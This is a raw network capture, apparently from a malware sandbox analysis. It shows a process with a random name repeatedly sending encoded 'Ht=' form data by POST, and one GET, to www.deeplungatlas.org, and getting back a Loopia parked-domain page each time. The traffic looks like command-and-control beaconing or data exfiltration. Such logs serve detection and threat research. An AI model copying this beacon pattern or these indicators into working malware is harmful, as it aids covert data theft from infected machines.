                                                          Nov 15, 2024 09:32:29.504849911 CET603OUTPOST /57zf/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.deeplungatlas.org
                                                          Origin: http://www.deeplungatlas.org
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 199
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.deeplungatlas.org/57zf/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Raw: 48 74 3d 63 51 2f 6a 73 52 74 67 74 78 77 67 46 63 56 6b 51 4d 4a 55 50 57 4c 72 33 6c 64 5a 35 44 31 41 59 4f 36 6d 74 74 37 7a 5a 69 54 4f 57 62 35 37 31 4a 67 73 4d 31 54 75 65 49 6d 38 42 4b 2b 41 6c 44 69 70 6a 54 31 76 58 77 64 66 58 4d 46 76 37 56 4b 4d 31 59 61 4a 5a 4f 76 63 4c 6e 73 59 66 4b 70 64 43 51 39 46 77 4a 33 54 77 6a 57 4d 47 79 77 53 78 47 4e 38 49 59 4e 46 4f 67 44 45 62 36 76 77 38 6c 39 32 6d 55 68 4c 50 6b 72 73 66 6a 39 7a 72 74 75 58 4a 51 32 6a 6c 43 67 62 48 31 61 50 62 78 4b 4b 71 6f 72 73 39 67 49 62 6e 63 50 56 49 78 54 65 4b 42 34 47 34 58 76 52 39 67 3d 3d
                                                          Data Ascii: Ht=cQ/jsRtgtxwgFcVkQMJUPWLr3ldZ5D1AYO6mtt7zZiTOWb571JgsM1TueIm8BK+AlDipjT1vXwdfXMFv7VKM1YaJZOvcLnsYfKpdCQ9FwJ3TwjWMGywSxGN8IYNFOgDEb6vw8l92mUhLPkrsfj9zrtuXJQ2jlCgbH1aPbxKKqors9gIbncPVIxTeKB4G4XvR9g==
                                                          Nov 15, 2024 09:32:30.335912943 CET1236INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Fri, 15 Nov 2024 08:32:30 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          X-Powered-By: PHP/8.1.29
                                                          Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                          Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                          Nov 15, 2024 09:32:30.335938931 CET1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                          Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                          Nov 15, 2024 09:32:30.335952044 CET1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                                          Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                          Nov 15, 2024 09:32:30.336018085 CET1236INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                                                          Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                                          Nov 15, 2024 09:32:30.336031914 CET878INData Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                                                          Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.1149987194.9.94.86803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:32:32.064378977 CET623OUTPOST /57zf/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.deeplungatlas.org
                                                          Origin: http://www.deeplungatlas.org
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 219
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.deeplungatlas.org/57zf/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Raw: 48 74 3d 63 51 2f 6a 73 52 74 67 74 78 77 67 48 34 70 6b 41 66 52 55 59 47 4c 71 72 31 64 5a 69 7a 31 45 59 4f 32 6d 74 6f 66 6a 61 57 2f 4f 58 2b 46 37 30 4e 30 73 50 31 54 75 56 6f 6d 44 4d 71 2b 78 6c 45 71 58 6a 51 74 76 58 77 5a 66 58 4a 68 76 36 6a 43 50 31 49 61 4c 57 75 76 65 57 33 73 59 66 4b 70 64 43 51 5a 76 77 4a 76 54 77 7a 6d 4d 55 44 77 54 79 47 4e 2f 42 34 4e 46 4b 67 44 41 62 36 76 43 38 6e 4a 51 6d 58 5a 4c 50 6b 37 73 47 58 52 77 6c 64 75 52 58 67 33 47 6a 48 4e 6f 4f 55 75 4f 64 52 65 74 72 70 33 67 78 47 46 42 33 2f 47 43 4c 69 62 63 65 6e 5a 32 78 6d 4b 59 6d 68 37 48 73 44 75 51 6a 4f 78 61 6a 2f 72 70 6f 4b 52 4e 4d 70 45 3d
                                                          Data Ascii: Ht=cQ/jsRtgtxwgH4pkAfRUYGLqr1dZiz1EYO2mtofjaW/OX+F70N0sP1TuVomDMq+xlEqXjQtvXwZfXJhv6jCP1IaLWuveW3sYfKpdCQZvwJvTwzmMUDwTyGN/B4NFKgDAb6vC8nJQmXZLPk7sGXRwlduRXg3GjHNoOUuOdRetrp3gxGFB3/GCLibcenZ2xmKYmh7HsDuQjOxaj/rpoKRNMpE=
                                                          Nov 15, 2024 09:32:32.894706011 CET1236INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Fri, 15 Nov 2024 08:32:32 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          X-Powered-By: PHP/8.1.29
                                                          Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                          Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                          Nov 15, 2024 09:32:32.894757986 CET212INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                          Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="init
                                                          Nov 15, 2024 09:32:32.894783974 CET1236INData Raw: 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65
                                                          Data Ascii: ial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/s
                                                          Nov 15, 2024 09:32:32.894798994 CET1236INData Raw: 20 73 74 61 72 74 65 64 3f 20 4c 6f 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73
                                                          Data Ascii: started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="div
                                                          Nov 15, 2024 09:32:32.894814968 CET1236INData Raw: 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70
                                                          Data Ascii: ith LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more
                                                          Nov 15, 2024 09:32:32.894829988 CET666INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                          Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.1149988194.9.94.86803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:32:34.602211952 CET1636OUTPOST /57zf/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.deeplungatlas.org
                                                          Origin: http://www.deeplungatlas.org
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 1231
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.deeplungatlas.org/57zf/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Raw: 48 74 3d 63 51 2f 6a 73 52 74 67 74 78 77 67 48 34 70 6b 41 66 52 55 59 47 4c 71 72 31 64 5a 69 7a 31 45 59 4f 32 6d 74 6f 66 6a 61 57 33 4f 57 4d 39 37 30 71 59 73 4f 31 54 75 63 49 6d 43 4d 71 2b 73 6c 46 4f 4c 6a 51 67 4e 58 32 46 66 57 71 5a 76 79 32 69 50 37 49 61 4c 64 4f 76 66 4c 6e 73 33 66 4b 34 55 43 51 70 76 77 4a 76 54 77 77 75 4d 44 43 77 54 30 47 4e 38 49 59 4e 7a 4f 67 44 34 62 36 48 53 38 6b 6c 41 6e 6d 35 4c 4d 46 4c 73 64 45 70 77 6a 4e 75 54 57 67 33 6b 6a 48 4a 33 4f 55 44 33 64 53 44 34 72 70 66 67 67 47 49 67 76 50 47 6a 55 67 44 77 4b 45 34 53 35 45 43 5a 6d 53 79 34 70 7a 79 77 31 75 56 48 76 50 50 68 33 6f 4d 4a 65 4a 77 55 65 77 76 30 59 72 55 44 31 78 38 47 6d 53 55 43 30 54 71 66 6b 56 44 78 6c 41 59 4a 63 58 74 46 76 58 6e 42 6a 64 57 67 5a 50 4f 39 77 67 51 59 6c 79 66 41 71 36 4b 7a 5a 74 63 36 31 43 32 6a 69 41 54 79 34 37 48 66 67 61 59 56 31 65 6c 51 2b 45 49 48 73 48 42 43 6d 4c 57 36 42 74 68 64 4c 7a 34 6d 47 37 48 41 42 71 6c 48 75 38 78 67 2b 49 33 79 78 56 39 [TRUNCATED]
                                                          Data Ascii: Ht=cQ/jsRtgtxwgH4pkAfRUYGLqr1dZiz1EYO2mtofjaW3OWM970qYsO1TucImCMq+slFOLjQgNX2FfWqZvy2iP7IaLdOvfLns3fK4UCQpvwJvTwwuMDCwT0GN8IYNzOgD4b6HS8klAnm5LMFLsdEpwjNuTWg3kjHJ3OUD3dSD4rpfggGIgvPGjUgDwKE4S5ECZmSy4pzyw1uVHvPPh3oMJeJwUewv0YrUD1x8GmSUC0TqfkVDxlAYJcXtFvXnBjdWgZPO9wgQYlyfAq6KzZtc61C2jiATy47HfgaYV1elQ+EIHsHBCmLW6BthdLz4mG7HABqlHu8xg+I3yxV9teRIyeyhKsdv3OEtdA7dc2PiHFPdjUO+odOunimjdaxU8onBj0bSxR8Q9Kj+2VxozF2A97LHkFLXvhky/3v8Jh0k/TSD5ZSmqST4AU5UFB/O3UHPsf6YRDIYymeR4bN+/4IWyPoO/zjGTc48VhJbWI+mYjn1pgGmGVp5rN1domhA0FYrUVhlUdEPSAGg/TwOrBVv2MFFAMvFrcDeAJSlLbaPngHLO5263NKk82kyeH3sHn2Q+DYzb0mLzD7YhaCWKgNLGkGwtaoqQQ8BVPSqDUwUbGVMZgx5B3sCbXHIzQ8MOWlt73KyPGk7uONlokzRndFMI0tMUvPQSnDKY5+DCRJiBHjpMs2tmHmGD9xx0E3XDRWi/MCbCFCXdrnEQF263gVKl/AMiyhRjIulYn97CnvqAvh+UZeMD7MgkPWb6Ke7NHTvxVbOmO226SgtO3oj7N9oTGzYO6vavHePMRfMG6aK9gE7UZJmpWo9fZH3d9vsaHcycw0RL+OoVD1trdn2oDhrTaYoSMF6DR9cB/fPdv3mJ/Dx37SROW7mCW2nQAGAsL2A+eLzjItmKhowN12hb2r/GR8Copq8iFrBjmZCJUSzB732hKVR2A5wCJAZPvXm7aW38bvT7xO0KFb6Tro4ciJXpu9Mrfi+WRmNoBupSuMWZ5MWDRY2Oi [TRUNCATED]
                                                          Nov 15, 2024 09:32:35.472021103 CET1236INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Fri, 15 Nov 2024 08:32:35 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          X-Powered-By: PHP/8.1.29
                                                          Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                          Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                          Nov 15, 2024 09:32:35.472040892 CET212INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                          Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="init
                                                          Nov 15, 2024 09:32:35.472057104 CET1236INData Raw: 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65
                                                          Data Ascii: ial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/s
                                                          Nov 15, 2024 09:32:35.472071886 CET1236INData Raw: 20 73 74 61 72 74 65 64 3f 20 4c 6f 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73
                                                          Data Ascii: started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="div
                                                          Nov 15, 2024 09:32:35.472088099 CET1236INData Raw: 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70
                                                          Data Ascii: ith LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more
                                                          Nov 15, 2024 09:32:35.472104073 CET666INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                          Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.1149989194.9.94.86803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:32:37.205796003 CET329OUTGET /57zf/?Ht=RSXDvmZ18TUSGahlBulUTEWs/Fcq4D9Pe8zesMLeYybHc+55raQPDCyvNJ+XALungzCzmhokbhdOc6Bo/lmi6ITFfezPRUw2CIw7GC9Ov+fkwE2kIiBG9Hg=&VRvXS=WfxxDba8X HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Host: www.deeplungatlas.org
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:32:38.015513897 CET1236INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Fri, 15 Nov 2024 08:32:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          X-Powered-By: PHP/8.1.29
                                                          Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
